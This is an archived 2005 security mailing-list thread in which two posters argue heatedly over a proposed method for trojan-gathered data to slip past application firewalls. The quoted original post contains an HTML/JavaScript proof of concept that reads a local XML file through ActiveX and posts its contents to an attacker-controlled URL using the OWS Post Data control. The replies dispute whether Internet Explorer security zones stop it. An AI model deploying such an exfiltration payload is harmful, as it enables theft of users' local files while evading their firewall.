[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <e4ce4c440512220852t72f63e7dped76adca9abc80f@mail.gmail.com>
Date: Thu Dec 22 16:52:08 2005
From: gaurav at securebox.org (Gaurav Kumar)
Subject: new attack technique? using
JavaScript+XML+OWSPost Data
oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years kidder than u)
The _real_ thing is that I proved the point.
U told win xp will give access denied error. I proved u wrong with the
proof attached.
U told above technique wont work...i proved u wrong.
Tell me one thing, a Windows XP + Offfice XP + Internet explorer
combination so rare ?
Is that all making ur ego shattered?
...and u are no one to decide what should one disuss on this list.
regards,
gaurav
On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> Kid,
> Although I normally don't reply to such frivilous and lame statements but
> your reply has seriously piss me off.. So dropping few lines, perhaps will
> help you grow up !!
>
> -----Original Message-----
> >> From: Gaurav Kumar brazenly wrote:
>
> >> Looks like u need to read again what i wrote. I didnt use the word
> 'spread'.
>
> I don't have to !! I can still remember your priceless statements [1] + [2]
> -
>
> [1] A Trojan has been to be placed in a system running an application
> [1] firewall like Zone Alarm Pro etc.
>
> [2] The target system must be having office XP and the user has to be
> [2] lured to view a webpage hosted by attacker.
>
>
> ROFL !! May be you could just ask your l33t victim to send you his passwords
> and other info by email :P Don't forget to send him your l33t email ID -
> '@...urebox.org'
>
>
> >> [3] Moreover, u need not know if the target system is running ZA or
> not...
> >> [3] "the technique works even if firewall is not installed".
>
> >> [4] I am discussing a possible 'design' of a trojan here, "doesnt matter
> is ZA
> >> [4] or any other FW is running on client".
>
> Looking at statement [3] & [4], (especially the statement within double
> quotes) just made me believe that you don't know what your are talking about
> unless you want to look like an idiot.
>
>
> >> really? ever heard of IE exploits?
>
> Priceless !!
>
>
> >> Well..Exactly! i would suggest u read the 'assumptions' first, its
> >> an assumption that user will click yes to warning...like most 'normal'
> users do.
>
> Yet another priceless statement... Maybe you could just ask your l33t victim
> to click 'yes' to your l33t piece of code trying to download some l33t piece
> of shit which will fail to run and die like an idiot.
>
>
> I am sure you have enough l33t skills to strick back to keep your ego
> up2date however, I wud rather suggest if you have only your stupidity to
> share then feel free to take it offline and don't piss off everyone in this
> list. I would welcome you if you really want to strike back with some
> _serious_ technical stuff. (Note: make a note of _serious_ in the statement)
>
> - D
>
>
>
>
> -----Original Message-----
> From: gkverma@...il.com [mailto:gkverma@...il.com] On Behalf Of Gaurav Kumar
> Sent: Thursday, December 22, 2005 8:52 AM
> To: Debasis Mohanty
> Cc: full-disclosure@...ts.grok.org.uk; websecurity@...appsec.org
> Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique?
> using JavaScript+XML+OWSPost Data
>
> On 12/22/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> > -----Original Message-----
> > From: Gaurav Kumar
> > Sent: Wednesday, December 21, 2005 8:59 PM
> > To: full-disclosure@...ts.grok.org.uk
> > Cc: websecurity@...appsec.org
> > Subject: [Full-disclosure] new attack technique? using
> > JavaScript+XML+OWSPost Data
> >
> > 1>> A Trojan has been to be placed in a system running an application
> > 1>> firewall like Zone Alarm Pro etc.
> >
> > >> Assumptions:
> >
> > 2>> The target system must be having office XP and the user has to be
> > 2>> lured to view a webpage hosted by attacker.
> >
> > 3>> The Trojan can be designed to generate an xml file which will
> > 3>> contain the data to be sent out. The attacker will lure
> > the
> > 3>> user to visit a website hosted by him.
> >
> > Lol !! In a practical scenario, the attacker who spreads the
> > worm/trojans himself is not aware in the initial stage which are the
> > infected machines unless the trojan sends back the machine/user info
> > back to the attacker. Now as you have already mentioned ZA is running
> > then no data can be sent back to the attacker. So the attacker is clueless
> which are those infected machines.
>
> Looks like u need to read again what i wrote. I didnt use the word 'spread'.
> Moreover, u need not know if the target system is running ZA or not...the
> technique works even if firewall is not installed. I am discussing a
> possible 'design' of a trojan here, doesnt matter is ZA or any other FW is
> running on client.
>
> > So the case of luring the user to visit the link is out of scope...
>
> really? ever heard of IE exploits?
>
> >
> > >> The site can have following HTML code-
> >
> > Now coming back to technical stuff, You are trying to access a local
> > file which will only be allowed if the site is in "Trusted Sites" or
> > "Local Intranet" or "Local Security Zone" and activex not marked safe.
> > The fact that *the client is also the server* is irrelevant.
> >
> > Try uploading the script to some webserver and give a html extention;
> > it will throw an _access denied_ error when the page loads (even on
> > Win XP + SP1).
> >
> > In case of any server side extention like *.asp, *.jsp etc, the user
> > will be prompted that an malicious component is trying to load and ask
> > for user permission.
> >
> >
> > >> <html>
> > >> <body>
> > >> The author is not responsible for any misuse, this PoC is for
> > >> educational purpose only.
> > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > >> id="exp">
> > >> </object>
> > >> <script LANGUAGE=javascript>
> > >> var xmlDoc
> > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > >> xmlDoc.async=false;
> > >> xmlDoc.load("c:\\note.xml");
> > >> xmlObj=xmlDoc.documentElement;
> > >> var a= xmlObj.firstChild.text;
> > >> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > >> </script>
> > >> </body>
> > >> </html>
> >
> >
> > >> The above code (works well on windows XP SP2) essentials calls "OWS
> > >> Post Data" COM control to post the contents of note.xml (generated
> > >> by trojan) to attackersite.com
> >
> > IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone"
> > and draw conclusion about "Internet Security Zone".
> >
> > You may also link to know about this issue -
> > http://support.microsoft.com/kb/317244/EN-US/
> >
> >
> > >>> Essentially, the technique is breaking the basic functionality of
> > >>> application firewalls by using OWS Post Data as bridge for sending
> > >>> out the data using Javascript and XML.
> >
> > Not Exactly !! I wud rather suggest you to do a little more research
> > and draw any conclusion. Keep those _Security Zones_ in mind before
> > you post anything...
>
> Well..Exactly! i would suggest u read the 'assumptions' first, its an
> assumption that user will click yes to warning...like most 'normal'
> users do.
> >
> >
> > - D
>
>
>
Powered by blists - more mailing lists